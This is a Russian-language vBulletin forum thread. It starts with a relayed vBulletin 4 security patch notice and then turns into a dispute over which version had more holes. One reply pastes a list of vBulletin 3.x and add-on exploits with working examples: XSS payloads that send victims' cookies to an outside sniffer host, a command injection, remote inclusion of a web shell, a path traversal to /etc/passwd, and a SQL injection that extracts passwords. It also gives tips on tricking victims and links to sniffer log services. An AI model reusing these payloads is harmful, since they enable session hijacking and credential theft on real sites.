Удаление папки /install/ - обязательно!

Файловый Архив

  • Неограниченное количество категорий и суб-категорий
  • Настройки прав доступа по группам
  • Настройки прав доступа по каждой категории
  • Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
  • Мультизагрузка файлов - SWFUploader
  • Добавление файлов с сервера
Подробности и история обновлений продукта в этой теме
Loading

Go Back   форум vBSupport.org > >
Register Изображения Меню vBsupport Files Manager Аллея Звёзд Реклама на форуме Search Today's Posts Mark Forums Read
  • Мемберка
  • Администраторам
  • Premoderation
  • For English speaking users
  • Изменения в правах
  • Каталог Фрилансеров
Пароли на скачивание файлов в Member Area меняются автоматически каждый день
Если вам нужно скачать какой то скрипт, за паролем ко мне в ЛС
привет какирам kerk
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Не можете скачать вложение?
Изменения в правах групп пользователей
внимательно читаем эту и эту темы
Короткая версия - тут
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

 
 
Old  
armagedon_kr
Продвинутый
 
armagedon_kr's Avatar
Default Исправления безопасности для VBulletin 4 7

A recent vBulletin 4 (all versions, Suite & Classic) report indicated that if an installation had been hacked previously, the attacker could hide malicious code to allow a repeated attack. To further strengthen vBulletin’s security - additional security checking and query cleaning were added to thwart such attacks.

The issue does not affect vBulletin 3.x.

To improve the security of your vBulletin 4 installation please download the patch from the members area of vBulletin: http://members.vbulletin.com/
We recommend you install this security patch as soon as possible.

The upgrade process is the same as previous patch level releases - simply download the patch from the Members' Area, extract the files and upload to your webserver, overwriting the existing files. There is no upgrade script required.
Additional Information:

This is an update to the previously fixed "social group search exploit"; this new report indicated that in some cases the attacker was able to leave a backdoor in the database to allow subsequent attacks even after a successful patch-fix. This updated patch will prevent such repeated attacks.

To be precise, this is the file that has been patched: packages/vbforum/search/type/socialgroupmessage.php

примерный перевод такой:
В недавней VBulletin 4 (все версии, Suite & Classic) указано, что в некоторых случаях злоумышленник смог оставить черный ход в базы данных для обеспечения последующих атак, даже после успешного патч-исправление. Это обновленный патч позволит предотвратить такие повторные атаки. Проблема не затрагивает VBulletin 3.x. Для повышения безопасности Вашего VBulletin 4 установки, пожалуйста, скачайте патч с площадки автора: HTTP : / / members.vbulletin.com / Мы рекомендуем установить это обновление как можно скорее. Процесс обновления такая же, как предыдущие релизы уровень патч - просто скачать патч с Площадки, извлечь файлы и загрузить на свой Веб-сервер с перезаписью существующих файлов. Существует не сценарий обновления требуется.

файл, который был исправлен: пакеты /vbforum/search/type/socialgroupmessage.php

armagedon_kr добавил 01.11.2011 в 04:28
простите за корявый перевод

Last edited by armagedon_kr : 11-01-2011 at 06:28 AM. Reason: Добавлено сообщение
 
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
Old  
Vovan
Специалист
 
Vovan's Avatar
Default 3

Ну и сам файлик
Attached Files
File Type: php socialgroupmessage.php (14.7 KB, 18 views)

Last edited by Vovan : 11-01-2011 at 12:05 PM.
 
Old  
kerk
k0t
 
kerk's Avatar
Default 0

"шо, опять?! ©"
опять дырка?
 
Old  
artscripts
Эксперт
 
artscripts's Avatar
Default 1

kerk, НЕ поясничай)) Когда тройка развивалась там дыр было поболее))
 
Old  
kerk
k0t
 
kerk's Avatar
Default 0

Quote:
Originally Posted by artscripts View Post
дыр было поболее
дыр практически небыло, не надо "ля-ля"
я говорю "практически", потому что недочеты все таки были
но таких косяков, как в 4, разработчики никогда не допускали
здесь же картинка совсем наоборот, форум очень быстро и уверенно превращается в решето
и скоро брэнд "vBulletin", будет в сети ассоциироваться со словами "никогда не ставь это гуано", "дырявый двиг" и подобными...
 
Old  
armagedon_kr
Продвинутый
 
armagedon_kr's Avatar
Default 0

и хоть бы кто поблагодарил за новость, файлик не смог прикрепить, нет прав:((( хотя всегда помогал, когда время было.
 
Old  
artscripts
Эксперт
 
artscripts's Avatar
Default 1

armagedon_kr, какие тут благодарности, дай с керком поспорить))

artscripts добавил 01.11.2011 в 13:40
kerk,

Quote:
vBulletin 3.0

3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:
Код:
www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:
Код:
<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>


3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
http://www.xz.сom/forumpath/newthrea...me='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0




vBulletin 3.5

3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter

Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:
Код:
www.xz.сom/forumpath/profile.php?do=editpassword
pass:your pass
email: vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}

Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:
Код:
http://www.xz.com/forumpath/install/...?step=SomeWord


3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a





Уязвимости в модулях vBulletin.

vBug Tracker 3.5.1 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
http://www.xz.сom/forumpath/vbugs.ph...3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E


ImpEx 1.74 - PHP-инклюдинг и выполнение команд
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
Код:
(1)
http://www.xz.сom/forumpath/impex/Im...d/r57shell.txt
http://www.xz.сom/forumpath/impex/Im.../../etc/passwd
(2)
http://www.site.com/forum/impex/ImpE...l.com/cmd?&=id
(3)
http://www.site.com/forum/impex/ImpE...l.com/cmd?&=id
(4)
http://www.site.com/forum/impex/ImpE...l.com/cmd?&=id

Exploit: http://www.securitylab.ru/vulnerabil...rce/264410.php

ibProArcade 2.x - SQL injection
Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:
Код:
http://www.xz.сom/forumpath/index.ph...report&user=-1 union select password from user where userid=[any_user]

Где [any_user] id нужного нам юзера.



При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php
Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru.
Далеко не полный список. Где твои "ля-ля" ?))

Last edited by artscripts : 11-01-2011 at 03:40 PM. Reason: Добавлено сообщение
 
Old  
Centurion
Эксперт
vBSSecurity
 
Centurion's Avatar
Default 0

artscripts, ну ты нашел что сравнить - "начало движка" и "эволюцию" в лице новой версии, которая должна изначально быть куда лучше и защищенней, чем предыдущие.
 
Old  
kerk
k0t
 
kerk's Avatar
Default 0

в сравнение нужно приводить именно ДЫРЫ движка, основных файлов форума
почти все перечисленные "уязвимости" - это XSS, т.е. не дыры как таковые, воспользоваться этими "дырками" может далеко не каждый
ibProArcade 2.x - SQL injection
vBug Tracker 3.5.1 - XSS
это вообще к движку не имеет никакого отношения
не будем перечислять все дырявые хаки, их слишком много
дальше...
импекс
рекомендуется удалять после конвертации, если админ этого не сделал, то кто ему доктор?
папка инстал
тоже самое, везде где только можно, твердим одно и то же, удаляйте папку после установки, но никто ж не читает, как и призывы не ставить УГ 4
==
Quote:
Originally Posted by artscripts View Post
Где твои "ля-ля"
они в соотношении количества дыр в четверке и тройке на определенный промежуток времени
четверка ДОЛЖНА быть гораздо более защищенной на основе многолетнего опыта разработки третьей линейки
когда оставили развитие 2-й линейки и начали писать 3-ку, разрабы учитывали свои ошибки
здесь же мы видим решето
 
Old  
artscripts
Эксперт
 
artscripts's Avatar
Default 0

kerk, Согласен, должны были учитывать, возможно дело в том что поменялись разработчики?
 
 

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 09:48 PM.


Powered by vBulletin® Version 3.0.4
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd.